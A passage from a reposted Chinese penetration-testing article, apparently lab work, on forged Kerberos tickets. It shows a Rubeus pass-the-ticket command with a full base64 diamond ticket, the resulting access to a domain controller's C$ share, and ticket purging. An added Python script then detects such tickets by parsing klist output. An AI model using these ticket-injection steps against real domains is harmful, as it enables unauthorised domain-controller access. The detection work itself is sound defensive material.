Rubeus.exeptt/ticket:doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0dwW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcFvnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqsPx5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmEdnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJr/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRusnAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9oKRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ+oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4JhqbdaofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpPIdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdzU9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOTpaMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfbQgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6LeTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCswKaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6ADAgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJapxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5DT00=

Output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ; 2022/7/17 18:09:02
      Server Name       : krbtgt/NAMI.COM @ NAMI.COM
      Client Name       : thor @ NAMI.COM
      Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)




Access the domain controller again:

C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

 \\WIN-A7DM9L6CVHH.nami.com\c$ 的目录

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节

Clear the tickets:

C:\Users\win7.NAMI0\Desktop>Rubeus.exe klist

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0x67e95


Access the domain controller again:

C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
拒绝访问。
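Every klist listing on this page shows the same thing a defender can key on: the logon session belongs to win7, yet the cached ticket is issued to a different client principal (testa, Administrator, thor). The mimikatz-built silver and golden tickets additionally carry a ten-year validity and renewal window, and the silver ticket is RC4-encrypted although the domain issues AES256 tickets, whereas the diamond ticket inherits a genuine ten-hour TGT lifetime and only the principal mismatch remains. The following script is an added example, not code from the page or from Rubeus: it parses Rubeus klist-style text and applies those checks, using samples reflowed from the three listings above. The policy limits (10 h ticket life, 7 d renewal) are the Kerberos policy defaults and are parameters, not values taken from this domain.

```python
"""Heuristics over Rubeus 'klist' output for tickets that do not fit the session.
Added example; constructed samples reflowed from the listings on this page."""
import re
from datetime import datetime

HEADER = """Action: List Kerberos Tickets (Current User)
[*] Current LUID : 0x67e95
  UserName                 : win7
  Domain                   : NAMI0
  LogonServer              : WIN-A7DM9L6CVHH
  UserPrincipalName        : win7@nami.com
"""
SILVER = HEADER + """    [0] - 0x17 - rc4_hmac
      Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com
      Client Name       : testa @ nami.com
      Flags             : pre_authent, renewable, forwardable (40a00000)
"""
GOLDEN = HEADER + """    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ; 2032/7/7 20:12:25
      Server Name       : krbtgt/nami.com @ nami.com
      Client Name       : Administrator @ nami.com
      Flags             : pre_authent, initial, renewable, forwardable (40e00000)
    [1] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ; 2022/7/17 20:12:42
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM
      Client Name       : Administrator @ nami.com
      Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
"""
DIAMOND = HEADER + """    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ; 2022/7/17 18:09:02
      Server Name       : krbtgt/NAMI.COM @ NAMI.COM
      Client Name       : thor @ NAMI.COM
      Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
"""

TIME = r"(\d+/\d+/\d+ \d+:\d+:\d+)"
TICKET_HEAD = re.compile(r"\[(\d+)\] - 0x[0-9a-fA-F]+ - (\S+)")


def _when(text):
    return datetime.strptime(text, "%Y/%m/%d %H:%M:%S")


def parse_klist(text):
    """Return (logon user, [ticket dicts]) from Rubeus klist-style text."""
    user = re.search(r"UserName\s*:\s*(\S+)", text).group(1)
    parts = TICKET_HEAD.split(text)        # [preamble, idx, etype, body, idx, etype, body, ...]
    tickets = []
    for i in range(1, len(parts), 3):
        idx, etype, body = int(parts[i]), parts[i + 1], parts[i + 2]
        start, end, renew = re.search(
            rf"Start/End/MaxRenew:\s*{TIME}\s*;\s*{TIME}\s*;\s*{TIME}", body).groups()
        flags = re.search(r"Flags\s*:\s*(.+?)\s*\(([0-9a-fA-F]+)\)", body)
        tickets.append({
            "index": idx, "etype": etype,
            "start": _when(start), "end": _when(end), "renew_till": _when(renew),
            "server": re.search(r"Server Name\s*:\s*(.+)", body).group(1).strip(),
            "client": re.search(r"Client Name\s*:\s*(.+)", body).group(1).strip(),
            "flags": [f.strip() for f in flags.group(1).split(",")],
            "flags_hex": flags.group(2).lower(),
        })
    return user, tickets


def assess(text, max_ticket_hours=10, max_renew_days=7):
    """Flag tickets that do not match the logon session or the domain's ticket policy.
    Limits default to the Kerberos policy defaults; pass the real domain values."""
    user, tickets = parse_klist(text)
    findings = []
    for t in tickets:
        def flag(code, detail):
            findings.append({"ticket": t["index"], "code": code, "detail": detail})
        principal = t["client"].split("@")[0].strip()
        if principal.lower() != user.lower():
            flag("client_mismatch", f"ticket for {principal!r} cached in the logon session of {user!r}")
        hours = (t["end"] - t["start"]).total_seconds() / 3600
        if hours > max_ticket_hours:
            flag("lifetime", f"{hours:.0f} h validity, policy maximum {max_ticket_hours} h")
        days = (t["renew_till"] - t["start"]).total_seconds() / 86400
        if days > max_renew_days:
            flag("renewal", f"{days:.0f} d renewal window, policy maximum {max_renew_days} d")
        if t["etype"].lower().startswith("rc4"):
            flag("rc4", "RC4-encrypted ticket although the domain issues AES256 tickets")
    return findings


if __name__ == "__main__":
    for name, listing in (("silver", SILVER), ("golden", GOLDEN), ("diamond", DIAMOND)):
        print(name)
        for f in assess(listing):
            print(f"  [{f['ticket']}] {f['code']}: {f['detail']}")
```

The diamond ticket trips only the session-owner check, which is the practical lesson of this page: lifetime- and etype-based detections that catch mimikatz defaults say nothing about a re-encrypted genuine TGT, so the comparison between the ticket's client principal and the owning logon session (and, on the DC side, 4769/4624 events for a principal with no matching 4768) has to carry the detection.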




Originally published on the WeChat official account moonsec: 内网渗透 银/金/钻石票据

Posted by admin on 2022-07-12 21:44:39. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): 内网渗透 银/金/钻石票据 http://cn-sec.com/archives/1172625.html
